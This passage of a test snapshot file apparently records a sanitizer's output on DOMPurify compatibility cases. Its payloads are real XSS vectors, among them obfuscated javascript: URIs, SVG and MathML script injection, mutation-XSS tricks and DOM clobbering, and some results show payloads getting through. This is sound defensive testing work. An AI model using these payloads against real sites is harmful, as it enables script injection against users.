    "<div id="129"><svg><image style="filter:url(&quot;data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(129)</script></svg>&quot;)">

</image></svg>//["'\`--&gt;]]&gt;]</div>",
  ],
  "payload": "<div id="129"><svg><image style='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(129)</script></svg>")'>
<!--
Same effect with
<image filter='...'>
-->
</svg>//["'\`-->]]>]</div>",
  "result": "<div id="129"><svg>

</svg>//["'\`--&gt;]]&gt;]</div>",
}
`;

exports[`dompurify compatibility > JavaScript URIs using Unicode LS/PS I > JavaScript URIs using Unicode LS/PS I 1`] = `
{
  "expected": "123<a>I am a dolphin!</a>",
  "payload": "123<a href=' javascript:alert(1)'>I am a dolphin!</a>",
  "result": "123<a href=" javascript:alert(1)">I am a dolphin!</a>",
}
`;

exports[`dompurify compatibility > JavaScript URIs using Unicode LS/PS II > JavaScript URIs using Unicode LS/PS II 1`] = `
{
  "expected": "123<a>I am a dolphin too!</a>",
  "payload": "123<a href=' javascript:alert(1)'>I am a dolphin too!</a>",
  "result": "123<a href=" javascript:alert(1)">I am a dolphin too!</a>",
}
`;

exports[`dompurify compatibility > JavaScript URIs using Unicode Whitespace > JavaScript URIs using Unicode Whitespace 1`] = `
{
  "expected": "123<a>CLICK</a><a>CLICK</a><a>CLICK</a><a>CLICK</a><a>CLICK</a><a>CLICK</a><a>CLICK</a><a>CLICK</a><a>CLICK</a><a>CLICK</a><a>CLICK</a><a>CLICK</a><a>CLICK</a><a>CLICK</a><a>CLICK</a><a>CLICK</a><a>CLICK</a><a>CLICK</a><a>CLICK</a>",
  "payload": "123<a href=' javascript:alert(1)'>CLICK</a><a href='&#xA0javascript:alert(1)'>CLICK</a><a href='&#x1680;javascript:alert(1)'>CLICK</a><a href='&#x180E;javascript:alert(1)'>CLICK</a><a href='&#x2000;javascript:alert(1)'>CLICK</a><a href='&#x2001;javascript:alert(1)'>CLICK</a><a href='&#x2002;javascript:alert(1)'>CLICK</a><a href='&#x2003;javascript:alert(1)'>CLICK</a><a href='&#x2004;javascript:alert(1)'>CLICK</a><a href='&#x2005;javascript:alert(1)'>CLICK</a><a href='&#x2006;javascript:alert(1)'>CLICK</a><a href='&#x2006;javascript:alert(1)'>CLICK</a><a href='&#x2007;javascript:alert(1)'>CLICK</a><a href='&#x2008;javascript:alert(1)'>CLICK</a><a href='&#x2009;javascript:alert(1)'>CLICK</a><a href='&#x200A;javascript:alert(1)'>CLICK</a><a href='&#x200B;javascript:alert(1)'>CLICK</a><a href='&#x205f;javascript:alert(1)'>CLICK</a><a href='&#x3000;javascript:alert(1)'>CLICK</a>",
  "result": "123<a href=" javascript:alert(1)">CLICK</a><a href="&nbsp;javascript:alert(1)">CLICK</a><a href=" javascript:alert(1)">CLICK</a><a href="᠎javascript:alert(1)">CLICK</a><a href=" javascript:alert(1)">CLICK</a><a href=" javascript:alert(1)">CLICK</a><a href=" javascript:alert(1)">CLICK</a><a href=" javascript:alert(1)">CLICK</a><a href=" javascript:alert(1)">CLICK</a><a href=" javascript:alert(1)">CLICK</a><a href=" javascript:alert(1)">CLICK</a><a href=" javascript:alert(1)">CLICK</a><a href=" javascript:alert(1)">CLICK</a><a href=" javascript:alert(1)">CLICK</a><a href=" javascript:alert(1)">CLICK</a><a href=" javascript:alert(1)">CLICK</a><a href="​javascript:alert(1)">CLICK</a><a href=" javascript:alert(1)">CLICK</a><a href="　javascript:alert(1)">CLICK</a>",
}
`;

exports[`dompurify compatibility > Low-range-ASCII obfuscated JavaScript URI > Low-range-ASCII obfuscated JavaScript URI 1`] = `
{
  "expected": "<a>@shafigullin</a><a></a>",
  "payload": "<a href="javascript:alert(1)">@shafigullin<a>",
  "result": "<a href="javascript:alert(1)">@shafigullin</a><a></a>",
}
`;

exports[`dompurify compatibility > MathML > MathML 1`] = `
{
  "expected": [
    "<div id="130"><math>CLICKME</math>
<math>





</math>//["'\`--&gt;]]&gt;]</div>",
    "<div id="130"><math>CLICKME</math>
<math>

CLICKME


CLICKME<mtext>http://http://google.com</mtext>
</math>//["'\`--&gt;]]&gt;]</div>",
    "<div id="130"><math>CLICKME</math>
//["'\`--&gt;]]&gt;]</div>",
  ],
  "payload": "<div id="130"><math href="javascript:alert(130)">CLICKME</math>
<math>
<!-- up to FF 13 -->
<maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction>

<!-- FF 14+ -->
<maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction>
</math>//["'\`-->]]>]</div>",
  "result": "<div id="130"><math>CLICKME</math>
<math>

CLICKME


CLICKMEhttp://http://google.com
</math>//["'\`--&gt;]]&gt;]</div>",
}
`;

exports[`dompurify compatibility > MathML example > MathML example 1`] = `
{
  "expected": [
    "<math display="block" xmlns="http://www.w3.org/1998/Math/MathML">
  <mrow>
    <menclose notation="box"><mi>a</mi></menclose><mo>,</mo>
    <menclose notation="box"><mi mathcolor="#FF0000">a</mi></menclose><mo>,</mo>
    <menclose mathcolor="#FF0000" notation="box"><mi>a</mi></menclose><mo>,</mo>
    <menclose mathbackground="#80FF80" notation="box"><mi mathcolor="#FF0000">a</mi></menclose><mo>,</mo>
    <menclose mathbackground="#80FF80" mathcolor="#FF0000" notation="box"><mi>a</mi></menclose><mo>,</mo>
    <menclose notation="box"><mi mathbackground="#80FF80">a</mi></menclose>
  </mrow>
</math>",
    "<math display="block" xmlns="http://www.w3.org/1998/Math/MathML">
  <mrow>
    <menclose notation="box"><mi>a</mi></menclose><mo>,</mo>
    <menclose notation="box"><mi mathcolor="#FF0000">a</mi></menclose><mo>,</mo>
    <menclose notation="box" mathcolor="#FF0000"><mi>a</mi></menclose><mo>,</mo>
    <menclose notation="box" mathbackground="#80FF80"><mi mathcolor="#FF0000">a</mi></menclose><mo>,</mo>
    <menclose notation="box" mathcolor="#FF0000" mathbackground="#80FF80"><mi>a</mi></menclose><mo>,</mo>
    <menclose notation="box"><mi mathbackground="#80FF80">a</mi></menclose>
  </mrow>
</math>",
  ],
  "payload": "<math xmlns="http://www.w3.org/1998/Math/MathML" display="block">
  <mrow>
    <menclose notation="box"><mi>a</mi></menclose><mo>,</mo>
    <menclose notation="box"><mi mathcolor="#FF0000">a</mi></menclose><mo>,</mo>
    <menclose notation="box" mathcolor="#FF0000"><mi>a</mi></menclose><mo>,</mo>
    <menclose notation="box" mathbackground="#80FF80"><mi mathcolor="#FF0000">a</mi></menclose><mo>,</mo>
    <menclose notation="box" mathcolor="#FF0000" mathbackground="#80FF80"><mi>a</mi></menclose><mo>,</mo>
    <menclose notation="box"><mi mathbackground="#80FF80">a</mi></menclose>
  </mrow>
</math>",
  "result": "<math xmlns="http://www.w3.org/1998/Math/MathML" display="block">
  <mrow>
    <menclose notation="box"><mi>a</mi></menclose><mo>,</mo>
    <menclose notation="box"><mi mathcolor="#FF0000">a</mi></menclose><mo>,</mo>
    <menclose notation="box" mathcolor="#FF0000"><mi>a</mi></menclose><mo>,</mo>
    <menclose notation="box" mathbackground="#80FF80"><mi mathcolor="#FF0000">a</mi></menclose><mo>,</mo>
    <menclose notation="box" mathcolor="#FF0000" mathbackground="#80FF80"><mi>a</mi></menclose><mo>,</mo>
    <menclose notation="box"><mi mathbackground="#80FF80">a</mi></menclose>
  </mrow>
</math>",
}
`;

exports[`dompurify compatibility > SVG > SVG 1`] = `
{
  "expected": "<div id="137"><svg>
<a xlink:href="?" xmlns:xlink="http://www.w3.org/1999/xlink">
<circle r="400"></circle>

</a>//["'\`--&gt;]]&gt;]</svg></div>",
  "payload": "<div id="137"><svg>
<a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?">
<circle r="400"></circle>
<animate attributeName="xlink:href" begin="0" from="javascript:alert(137)" to="&" />
</a>//["'\`-->]]>]</div>",
  "result": "<div id="137"><svg>



//["'\`--&gt;]]&gt;]</svg></div>",
}
`;

exports[`dompurify compatibility > Special esacpes in protocol handler for XSS in Blink > Special esacpes in protocol handler for XSS in Blink 1`] = `
{
  "expected": "<a>@shafigullin</a><a></a>",
  "payload": "<a href="javascript:alert(1)">@shafigullin<a>",
  "result": "<a href="javascript:alert(1)">@shafigullin</a><a></a>",
}
`;

exports[`dompurify compatibility > Test against fake-element-based namepsace-confusion abusing mXSS attacks 1/2 > Test against fake-element-based namepsace-confusion abusing mXSS attacks 1/2 1`] = `
{
  "expected": "a<svg><desc></desc></svg>",
  "payload": "a<svg><xss><desc><noscript>&lt;/noscript>&lt;/desc>&lt;s>&lt/s>&lt;style>&lt;a title="&lt;/style>&lt;img src onerror=alert(1)>">",
  "result": "a<svg>&lt;/noscript&gt;&lt;/desc&gt;&lt;s&gt;&lt;/s&gt;&lt;style&gt;&lt;a title="&lt;/style&gt;&lt;img src onerror=alert(1)&gt;"&gt;</svg>",
}
`;

exports[`dompurify compatibility > Tests against attribute-based mXSS behavior 1/3 > Tests against attribute-based mXSS behavior 1/3 1`] = `
{
  "expected": [
    "<svg></svg><p></p><style><g title="</style><img src="x">"&gt;",
    "<svg></svg><p></p><img src="x">"&gt;",
    "<svg></svg><p><img src="x">"&gt;</p>",
  ],
  "payload": "<svg><p><style><g title="</style><img src=x onerror=alert(1)>">",
  "result": "<svg></svg><p><img src="x">"&gt;</p>",
}
`;

exports[`dompurify compatibility > Tests against attribute-based mXSS behavior 2/3 > Tests against attribute-based mXSS behavior 2/3 1`] = `
{
  "expected": "<svg></svg>",
  "payload": "<svg><foreignobject><p><style><p title="</style><iframe onload&#x3d;alert(1)<!--"></style>",
  "result": "<svg>&lt;p title="&lt;/style&gt;</svg>",
}
`;

exports[`dompurify compatibility > Tests against attribute-based mXSS behavior 3/3 > Tests against attribute-based mXSS behavior 3/3 1`] = `
{
  "expected": "<math></math>",
  "payload": "<math><annotation-xml encoding="text/html"><p><style><p title="</style><iframe onload&#x3d;alert(1)<!--"></style>",
  "result": "<math>&lt;p title="&lt;/style&gt;</math>",
}
`;

exports[`dompurify compatibility > Tests against nesting-based mXSS behavior 1/5 > Tests against nesting-based mXSS behavior 1/5 1`] = `
{
  "expected": "<form><math><mtext><form></form></mtext></math></form>",
  "payload": "<form><math><mtext></form><form><mglyph><style><img src=x onerror=alert(1)>",
  "result": "<form><math><mtext><form>&lt;img src=x onerror=alert(1)&gt;</form></mtext></math></form>",
}
`;

exports[`dompurify compatibility > Tests against nesting-based mXSS behavior 2/5 > Tests against nesting-based mXSS behavior 2/5 1`] = `
{
  "expected": "<math><mtext><table></table></mtext></math>",
  "payload": "<math><mtext><table><mglyph><style><math href=javascript:alert(1)>CLICKME</math>",
  "result": "<math><mtext>&lt;math href=javascript:alert(1)&gt;CLICKME&lt;/math&gt;<table></table></mtext></math>",
}
`;

exports[`dompurify compatibility > Tests against nesting-based mXSS behavior 3/5 > Tests against nesting-based mXSS behavior 3/5 1`] = `
{
  "expected": "<math><mtext><table></table></mtext></math>",
  "payload": "<math><mtext><table><mglyph><style><!--</style><img title="--&gt;&lt;img src=1 onerror=alert(1)&gt;">",
  "result": "<math><mtext>&lt;!--<table></table></mtext></math>",
}
`;

exports[`dompurify compatibility > Tests against proper handling of leading whitespaces > Tests against proper handling of leading whitespaces 1`] = `
{
  "expected": " ",
  "payload": " ",
  "result": "",
}
`;

exports[`dompurify compatibility > onclick, onsubmit, onfocus; DOM clobbering: parentNode > onclick, onsubmit, onfocus; DOM clobbering: parentNode 1`] = `
{
  "expected": "<div><form><input>123</form></div>",
  "payload": "<div onclick=alert(0)><form onsubmit=alert(1)><input onfocus=alert(2) name=parentNode>123</form></div>",
  "result": "<div><form><input name="parentNode">123</form></div>",
}
`;

exports[`dompurify compatibility > onsubmit, onfocus; DOM clobbering: attributes > onsubmit, onfocus; DOM clobbering: attributes 1`] = `
{
  "expected": "<form><input>123</form>",
  "payload": "<form onsubmit=alert(1)><input onfocus=alert(2) name=attributes>123</form>",
  "result": "<form><input name="attributes">123</form>",
}
`;

exports[`dompurify compatibility > onsubmit, onfocus; DOM clobbering: children > onsubmit, onfocus; DOM clobbering: children 1`] = `
{
  "expected": "<form><input>123</form>",
  "payload": "<form onsubmit=alert(1)><input onfocus=alert(2) name=children>123</form>",
  "result": "<form><input name="children">123</form>",
}
`;

exports[`dompurify compatibility > onsubmit, onfocus; DOM clobbering: nodeName > onsubmit, onfocus; DOM clobbering: nodeName 1`] = `
{
  "expected": "<form><input>123</form>",
  "payload": "<form onsubmit=alert(1)><input onfocus=alert(2) name=nodeName>123</form>",
  "result": "<form><input name="nodeName">123</form>",
}
`;

exports[`dompurify compatibility > onsubmit, onfocus; DOM clobbering: nodeType > onsubmit, onfocus; DOM clobbering: nodeType 1`] = `
{
  "expected": "<form><input>123</form>",
  "payload": "<form onsubmit=alert(1)><input onfocus=alert(2) name=nodeType>123</form>",
  "result": "<form><input name="nodeType">123</form>",
}
`;

exports[`dompurify compatibility > onsubmit, onfocus; DOM clobbering: removeAttributeNode > onsubmit, onfocus; DOM clobbering: removeAttributeNode 1`] = `
{
  "expected": "<form><input>123</form>",
  "payload": "<form onsubmit=alert(1)><input onfocus=alert(2) name=removeAttributeNode>123</form>",
  "result": "<form><input name="removeAttributeNode">123</form>",
}
`;

exports[`dompurify compatibility > onsubmit, onfocus; DOM clobbering: removeChild > onsubmit, onfocus; DOM clobbering: removeChild 1`] = `
{
  "expected": "<form><input>123</form>",
  "payload": "<form onsubmit=alert(1)><input onfocus=alert(2) name=removeChild>123</form>",
  "result": "<form><input name="removeChild">123</form>",
}
`;

exports[`dompurify compatibility > onsubmit, onfocus; DOM clobbering: setAttribute > onsubmit, onfocus; DOM clobbering: setAttribute 1`] = `
{
  "expected": "<form><input>123</form>",
  "payload": "<form onsubmit=alert(1)><input onfocus=alert(2) name=setAttribute>123</form>",
  "result": "<form><input name="setAttribute">123</form>",
}
`;

exports[`dompurify compatibility > safe usage of URI-like attribute values (see #135) > safe usage of URI-like attribute values (see #135) 1`] = `
{
  "expected": "<b title="javascript:alert(2)"></b>",
  "payload": "<b href="javascript:alert(1)" title="javascript:alert(2)"></b>",
  "result": "<b></b>",
}
`;

exports[`dompurify compatibility > src Attributes for IMG, AUDIO, VIDEO and SOURCE (see #131) > src Attributes for IMG, AUDIO, VIDEO and SOURCE (see #131) 1`] = `
{
  "expected": "<img src="data:,123"><audio src="data:,456"></audio><video src="data:,789"></video><source src="data:,012"><div></div>",
  "payload": "<img src="data:,123"><audio src="data:,456"></audio><video src="data:,789"></video><source src="data:,012"><div src="data:,345">",
  "result": "<img><audio></audio><video></video><div src="data:,345"></div>",
}
`;
